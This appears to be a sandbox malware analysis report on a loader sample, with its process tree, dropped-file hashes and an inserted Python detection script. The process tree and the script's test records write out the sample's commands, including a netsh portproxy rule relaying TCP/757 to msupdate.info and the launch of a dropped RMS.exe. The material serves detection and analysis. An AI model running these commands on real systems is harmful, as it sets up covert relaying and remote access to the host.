Analysis

  • max time kernel: 145s
  • max time network: 146s
  • platform: windows10-2004_x64
  • resource: win10v2004-20220414-en
  • submitted: 03-05-2022 11:43

General

  • Target: $77_loader.exe
  • Size: 397KB
  • MD5: aff57ee1a4f3731c2036046910f78fb4
  • SHA1: ef9627c0cadff85a3dfaab6aef0b7c885f03b186
  • SHA256: 3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4
  • SHA512: 5ae93c6dae61782a7ac2fa2079df7006e0655d73e32fd7df1a5c1d44e47fd7dd2da225ea6f93e9d3dcb09be5f84b5dab2130bb4f2d5b0e05d95e866ebde0163f

Score
8/10

Malware Config

Signatures

  • Downloads MZ/PE file
  • Executes dropped EXE (1 IoC)
  • Sets file execution options in registry (2 TTPs)
  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up the country code configured in the registry, likely a geofence.

  • Modifies WinLogon (2 TTPs, 3 IoCs)
  • Modifies PowerShell logging option (1 TTP)
  • Drops file in Windows directory (2 IoCs)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour. (Generic sandbox heuristic text; nothing else in this report shows file-encryption activity.)

  • Gathers network information (2 TTPs, 3 IoCs)

    Uses a command-line utility to view the network configuration.

  • Suspicious behavior: EnumeratesProcesses (8 IoCs)
  • Suspicious use of AdjustPrivilegeToken (5 IoCs)
  • Suspicious use of WriteProcessMemory (27 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\$77_loader.exe
    "C:\Users\Admin\AppData\Local\Temp\$77_loader.exe"
    1⤵
    • Checks computer location settings
    • Modifies WinLogon
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:924

    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0coomqsh.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3280

      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84F5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC84F4.tmp"
        3⤵
        PID:2412

    • C:\Windows\system32\chcp.com
      "C:\Windows\system32\chcp.com" 437
      2⤵
      PID:2876

    • C:\Windows\system32\netsh.exe
      "C:\Windows\system32\netsh.exe" interface portproxy show all
      2⤵
      PID:4276

    • C:\Windows\system32\NETSTAT.EXE
      "C:\Windows\system32\NETSTAT.EXE" -na
      2⤵
      • Gathers network information
      • Suspicious use of AdjustPrivilegeToken
      PID:4460

    • C:\Windows\system32\NETSTAT.EXE
      "C:\Windows\system32\NETSTAT.EXE" -na
      2⤵
      • Gathers network information
      • Suspicious use of AdjustPrivilegeToken
      PID:3216

    • C:\Windows\system32\NETSTAT.EXE
      "C:\Windows\system32\NETSTAT.EXE" -na
      2⤵
      • Gathers network information
      • Suspicious use of AdjustPrivilegeToken
      PID:3348

    • C:\Windows\system32\netsh.exe
      "C:\Windows\system32\netsh.exe" interface portproxy reset
      2⤵
      PID:1700

    • C:\Windows\system32\netsh.exe
      "C:\Windows\system32\netsh.exe" interface portproxy show all
      2⤵
      PID:3132

    • C:\Windows\system32\netsh.exe
      "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=80 connectaddress=msupdate.info
      2⤵
      PID:3312

    • C:\Windows\system32\netsh.exe
      "C:\Windows\system32\netsh.exe" interface portproxy show all
      2⤵
      PID:2808

    • C:\Windows\system32\netsh.exe
      "C:\Windows\system32\netsh.exe" interface portproxy show all
      2⤵
      PID:3744

    • C:\Users\Admin\AppData\Local\Temp\RMS.exe
      "C:\Users\Admin\AppData\Local\Temp\RMS.exe"
      2⤵
      • Executes dropped EXE
      PID:2004

  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3572
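The process tree above shows three things a responder would want to alert on rather than read off a report by hand: the loader compiles C# on the fly (csc.exe invoked with /noconfig /fullpaths and an @-response file in %TEMP%, followed by cvtres.exe, which is the footprint of the .NET CodeDOM CompileAssemblyFromSource path and explains the 0coomqsh.cs/.cmdline/.dll/.pdb artifacts listed under Downloads); it wipes and re-creates a netsh portproxy rule so that anything reaching the host on TCP/757 is relayed to msupdate.info:80; and it then launches a freshly dropped RMS.exe from the same temp directory. The block below is an added example and is not code from the report, the sandbox or the sample: it re-implements those three checks as plain Python over process-creation records constructed from the command lines and PIDs shown above. The ProcEvent/Finding record shapes, the rule names and the benign control record are this example's own assumptions.

```python
"""Added example (not part of the sandbox report or the sample): a detection
pass over constructed process-creation records for the behaviours in the
process tree above. Rule names and record shapes are this example's own."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


# Constructed from the process tree in the report (PIDs as listed there);
# the final record is a benign control (loopback forward) that must not fire.
SAMPLE_EVENTS = [
    ProcEvent(924, 0, r"C:\Users\Admin\AppData\Local\Temp\$77_loader.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\$77_loader.exe"'),
    ProcEvent(3280, 924, r"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths '
              r'@"C:\Users\Admin\AppData\Local\Temp\0coomqsh.cmdline"'),
    ProcEvent(4276, 924, r"C:\Windows\system32\netsh.exe",
              r'"C:\Windows\system32\netsh.exe" interface portproxy show all'),
    ProcEvent(1700, 924, r"C:\Windows\system32\netsh.exe",
              r'"C:\Windows\system32\netsh.exe" interface portproxy reset'),
    ProcEvent(3312, 924, r"C:\Windows\system32\netsh.exe",
              r'"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 '
              r'listenport=757 connectport=80 connectaddress=msupdate.info'),
    ProcEvent(2004, 924, r"C:\Users\Admin\AppData\Local\Temp\RMS.exe",
              r'"C:\Users\Admin\AppData\Local\Temp\RMS.exe"'),
    ProcEvent(5000, 4999, r"C:\Windows\system32\netsh.exe",
              r"netsh int portproxy add v4tov4 listenport=8080 connectport=80 connectaddress=127.0.0.1"),
]

TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# Loopback / RFC 1918 / unspecified targets are the ordinary local use of portproxy.
LOCAL_TARGET_RE = re.compile(
    r"^(localhost|0\.0\.0\.0|::1?|127\.|10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)", re.IGNORECASE)


def tokens(cmdline: str) -> list[str]:
    """Split a Windows command line on whitespace, keeping quoted runs together."""
    return [t.replace('"', "") for t in re.findall(r'(?:[^\s"]+|"[^"]*")+', cmdline)]


def basename(path: str) -> str:
    return re.split(r"[\\/]", path)[-1].lower()


def parse_portproxy_add(cmdline: str) -> dict[str, str] | None:
    """Return the key=value arguments of a 'netsh interface portproxy add' command.

    netsh accepts unambiguous prefixes of its keywords ('int', 'portp'), so the
    context words are matched by prefix rather than literally.
    """
    toks = [t.lower() for t in tokens(cmdline)]
    if len(toks) < 5 or basename(toks[0]) not in ("netsh", "netsh.exe"):
        return None
    ctx, mode, verb, kind = toks[1], toks[2], toks[3], toks[4]
    if not ("interface".startswith(ctx) and "portproxy".startswith(mode) and verb == "add"
            and kind in ("v4tov4", "v4tov6", "v6tov4", "v6tov6")):
        return None
    args = dict(t.split("=", 1) for t in toks[5:] if "=" in t)
    return args if "listenport" in args and "connectaddress" in args else None


def detect(events: list[ProcEvent]) -> list[Finding]:
    """Apply the three rules; parent/child relations come from the ppid field."""
    by_pid = {e.pid: e for e in events}
    findings: list[Finding] = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        if name == "netsh.exe":
            args = parse_portproxy_add(e.cmdline)
            if args and not LOCAL_TARGET_RE.match(args["connectaddress"]):
                listen = f"{args.get('listenaddress', '*')}:{args['listenport']}"
                target = f"{args['connectaddress']}:{args.get('connectport', args['listenport'])}"
                findings.append(Finding(e.pid, "portproxy_external", f"{listen} -> {target}"))
        elif name == "csc.exe":
            # A response file under %TEMP% is the CodeDOM/CompileAssemblyFromSource footprint.
            rsp = next((t[1:] for t in tokens(e.cmdline) if t.startswith("@")), "")
            if TEMP_DIR_RE.search(rsp):
                who = basename(parent.image) if parent else "?"
                findings.append(Finding(e.pid, "csc_temp_compile", f"{who} compiled {rsp}"))
        elif TEMP_DIR_RE.search(e.image) and parent and TEMP_DIR_RE.search(parent.image):
            findings.append(Finding(e.pid, "dropped_exe_from_temp",
                                    f"{basename(parent.image)} launched {e.image}"))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"PID {f.pid:<5} {f.rule:<22} {f.detail}")
```

On the sample records this yields exactly three findings (PIDs 3312, 3280 and 2004) and stays quiet on the loopback control. When cleaning up a host, note that portproxy rules outlive the process that created them: they are stored under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp and served by the IP Helper service (iphlpsvc), so the rule has to be deleted with `netsh interface portproxy delete v4tov4 listenport=757` (or `reset`) and the registry key re-checked, and until then the host remains a relay to msupdate.info on TCP/757.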

Network

MITRE ATT&CK Enterprise v6


Downloads

  • C:\Users\Admin\AppData\Local\Temp\0coomqsh.dll
    Filesize: 3KB
    MD5: 6621e21b1f79d57fea5b7f660526cc0d
    SHA1: 5c1951409c8a761be7de78391ace2f7fbc972c3a
    SHA256: 279b9fb0494206b6562f826998ca6f2b5af552d84c142686936992c745aaae5b
    SHA512: 059a22049966c4562a87e8bd1145381f11110f396569823aae6ac42f96e9e03f2125eed3a062c06332dfac893990ddde73d3919f07975293c4f35aaa15f08da4

  • C:\Users\Admin\AppData\Local\Temp\0coomqsh.pdb
    Filesize: 11KB
    MD5: c91fc1037127f6b80d0bd8214100d8a1
    SHA1: 54f0e018a94ba3394fdc0d0d7ae1266c1fa2b4ec
    SHA256: 81eda64e81398b2e2aa3c10f9512df43f97bbb4eff244316affc64544346d5eb
    SHA512: 8ed342be209b892297c5f89fa6e0866b72ae9bda20220758b26dc9ad97382135a3e105801070fbf9638851b5d47556827ca912109d5bf22d7948f3c7a08c7a1d

  • C:\Users\Admin\AppData\Local\Temp\RES84F5.tmp
    Filesize: 1KB
    MD5: c666d634ada8f4e17b7ea27c58c45d43
    SHA1: be0d200ce987774c64d211d1933bcfa59d422b06
    SHA256: 81c8b1585aa586f7a713c6379c627731040ebd6548dd95d6226c4293b4a41512
    SHA512: 4d0a5542d0b8ab822a592a215f50efa51d9af892deaef45566922e9754ecb36e85d4464a1b7f475f94cc70f765601a94759ab2a4ccc96537921c71480c2b260a

  • C:\Users\Admin\AppData\Local\Temp\RMS.exe
    Filesize: 8.3MB
    MD5: 73f351beae5c881fafe36f42cde9a47c
    SHA1: dc1425cfd5569bd59f5d56432df875b59da9300b
    SHA256: a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824
    SHA512: f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66

  • \??\c:\Users\Admin\AppData\Local\Temp\0coomqsh.0.cs
    Filesize: 447B
    MD5: 1640a04633fee0dfdc7e22c4f4063bf6
    SHA1: 3cb525c47b5dd37f8ee45b034c9452265fba5476
    SHA256: 55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0
    SHA512: 85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d

  • \??\c:\Users\Admin\AppData\Local\Temp\0coomqsh.cmdline
    Filesize: 309B
    MD5: d857d70711643aaf2282e7c220530081
    SHA1: 8f783c6b233e7675a9a6633d5ed5f44bcc5d0779
    SHA256: 042f78299f09cb6b4de318cf9c2a2758606eff5bebd25d4c2fd388d3ac03f309
    SHA512: 0b0603ba42bb86466c95b37dd1a0657d646dbcfe741ff7223cf6cc54a73efa307a3c49030b06c2d8727151e353ed7c98784ccfe23e88e5f444606ae5d04277af

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC84F4.tmp
    Filesize: 652B
    MD5: 1f555cf55bef11bc4dc295f80e6a3e29
    SHA1: 9538a4734ecc52ac3f89b0e4411d4c61c7ae7473
    SHA256: 0f53e2cfd88c6138e5784731871ef605dbc32a750c43aad3604d16ee44fe991c
    SHA512: cec2e94d0662b7ac497f104a11ccfe9bdfa70f0b89affbda8dc109633154a7a1e33424c48ac42c4bfb701e1df5bbf40765c1f91711e378332046c356add88928

  • memory/924-130-0x000000001BB50000-0x000000001C6AD000-memory.dmp
    Filesize: 11.4MB

  • memory/1700-144-0x0000000000000000-mapping.dmp
  • memory/2004-149-0x0000000000000000-mapping.dmp
  • memory/2412-134-0x0000000000000000-mapping.dmp
  • memory/2808-147-0x0000000000000000-mapping.dmp
  • memory/2876-139-0x0000000000000000-mapping.dmp
  • memory/3132-145-0x0000000000000000-mapping.dmp
  • memory/3216-142-0x0000000000000000-mapping.dmp
  • memory/3280-131-0x0000000000000000-mapping.dmp
  • memory/3312-146-0x0000000000000000-mapping.dmp
  • memory/3348-143-0x0000000000000000-mapping.dmp
  • memory/3744-148-0x0000000000000000-mapping.dmp
  • memory/4276-140-0x0000000000000000-mapping.dmp
  • memory/4460-141-0x0000000000000000-mapping.dmp